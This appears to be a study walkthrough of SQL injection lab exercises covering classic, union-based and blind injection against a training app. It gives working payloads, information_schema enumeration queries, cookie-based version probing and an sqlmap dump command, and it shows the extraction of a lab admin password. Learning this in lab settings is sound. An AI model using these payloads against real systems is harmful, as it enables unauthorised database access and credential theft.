Web Security Under-the-hoods

Basic web app vulnerabilities walk-through. I hope you find this beneficial

SQL Injection

The hypothesis - the app executes below SQL query after a user enters user input and click Enter button.

SELECT email from users WHERE username = 'user_input'

This is because when user input is jeremy, the corresponding email is displayed. Use below payload.

jeremy' or 1=1#

The below payload works because the SQL modified SQL query executed by the app would be as per below. 

SELECT email from users WHERE username = 'jeremy' or 1=1#

As a result the app will display all the data in the table. 1=1 equals to True boolean value. In case of a while loop, the loop will processes True value, resulting in iterating each row of the table and then displays all the result on the screen. The payload will still work if we try other username (fake_user) that doesn't exist in the database. This is because OR operator only wants either 'fake_user' or 1=1 to be true so it doesn't care. So that's why we use OR not AND. But what does the ' do in the payload ? If ' doesn't come right after jeremy, the modified SQL query would be like below which will not yield any result.

SELECT email from users WHERE username = 'jeremy or 1=1#'

Union Based SQL Injection

Union based is used when we wanna take a look or exfiltrate additional juicy information from the database by querying data from other tables in the database. Let's say you have a valid username jeremy and you wanna know his password so you would guess that his password is stored in a table elsewhere. There is one contraints however, in order to use the UNION, you can ONLY SELECT the same number of columns as in the original SQL query. For example the query SELECT email from users WHERE username = 'user_input'. Let's make a hypothesis first.

First hypothesis is the query only select one column which is email. To test this, we use jeremy' union select null#

Second hypothesis is the original query select multiple columns. To test this, we can add null one by one to look for the right amount of columns selected. Use this payload jeremy' union select null,null# and jeremy' union select null,null,null#. The last payload gives an output which confirms the columns selected by the original query is 3.

Information_schema is a default database in the SQL server where it stores the metadata of the system for example tables, columns, and other objects stored in the system. Think of it like the brain of the system where our human brain stores all the information that we have.

Provided that we have to use three columns to successfully use the UNION statement, we can modify the previous SQL queries to take display information from the information_schema database. This can be useful if we wanna get other information like passwords etc.

jeremy' UNION SELECT null,null,schema_name FROM information_schema.schemata#

Okay let me break it down for you. schema_name is a column, we are querying for it from the schemata table that resides in the information_schema database. So this payload will actually show you the databases available by displaying the databases' names.

databases identified
jeremy' UNION SELECT null,null,column_name FROM information_schema.columns#
jeremy' UNION SELECT null,null,table_name FROM information_schema.tables#

Now, from the payload that lists all the columns, we can see that there is a column named password. Now use the payload below to list password column entries from the table associated with this challenge which is the injection0x01 table.

jeremy' UNION SELECT null,null,password FROM injection0x01#

Blind SQL Injection

Blind SQL injection is where the payload used doesn't yield any displayed results. It can only determined its success by analyzing the response in Burp Suite. In SQL injection attack, we need to constantly wonder how something that is sent to the server is processed for example credentials and cookies. One instance of the attack is tampering with the cookie parameter to know the version of the DBMS. The version itself doesn't get printed on the web page, instead it confirms it by having valid successful response in by the server.

For this lab, we are given a set of valid credentials to log in.

  1. Login with the creds

  2. Open the Post request (the one that sends over the creds to the server). Server will supply the session with a cookie in response to the POST req.

  3. Open the GET request right after the POST request. Now we see the cookie parameter that can be tampered to do sql injection attack.

  4. Copy it to Repeater and play with the cookie parameter. See walkthrough below.

Now let's try some basic injection payloads

' and 1=1# and ' or 1=1# will work because the and operator requires both sides (the cookie and 1=1) are true where the or operator requires one side to be true which makes using an invalid cookie will return as true also thus making the attack successful.

But what do we get from this attack ? hahaha. We are already logged in using jeremy credentials. Like in UNION-based attack, we get to make the web page lists all the tables and stuff. But in this lab, the ' or 1=1# payload is only to confirm that the cookie parameter is valid door for sql injection attack, thus more attacks can be done to retrieve more information. The theory is to use a more intricate payload, and to determine whether it is successful or not, look at the response. When you are logged in, the content-length parameter in the response would be like this Content-Length: 1027 . So, if the payload you inserted is successful, you will get the same Content-Length.

Right now, we wanna use substring in the payload and we will use it to know the right version of the DBMS. The basic usage of the paylaod is as below.

' or substring('test',1,1) = 't'#

To know the version of the DBMS, use below payload

' or substring((version()),1,1) = '8'#

Above payload is used to determine whether the version of the DBMS starts with number 8. If it does, the response will have Content-Length: 1027. Now, forward the request in Repeater to see for yourself. After playing with the payload, the final payload will be as below 

' or substring((version()),1,5) = '8.0.3'#

We can use sqlmap to do an automated attack.

  1. Copy the GET request that contains the Cookie parameter and save to req.txt

  2. use command sqlmap -r req.txt --level=2 --dump to specifically inject into Cookie

Challenge

Retrieve the admin's credentials from this simple system.

Let's see how many columns does it need in order to make the union-based payload works. After 

tanjyoubi sushi rack' union select null,null,null,null#

Finally, the above paylaod is the one that returns anything. Meaning it needs four columns in order to work. 

tanjyoubi sushi rack' union select null,null,null,version()#

We can use the above payload to extract the DBMS version which is 8.0.42

Below payload is to display available databases. Database peh-labs would be of interest to us

tanjyoubi sushi rack' union select null,null,null,schema_name from information_schema.schemata#

Below payload is to display available tables in the peh-labs databases. Two tables injection0x03_users and injection0x03_products would be of interest to us so let's investigate the injection0x03_users table

tanjyoubi sushi rack' union select null,null,null,table_name from information_schema.tables where shcema_table = 'peh-labs'#

Below payload lists the columns available in the injection0x03_users table. This would display username and password column

tanjyoubi sushi rack' union select null,null,null,column_name from information_schema.columns where table_name = 'injection0x03_users'#

Next, list all usernames in the username column. Takeshi may be the admin 

tanjyoubi sushi rack' union select null,null,null,username from injection0x03_users#

Payload below lists the password in the password column. Takeshi's password is onigirigadaisuki

tanjyoubi sushi rack' union select null,null,null,password from injection0x03_users#
PreviousDocker Guides

Last updated

Was this helpful?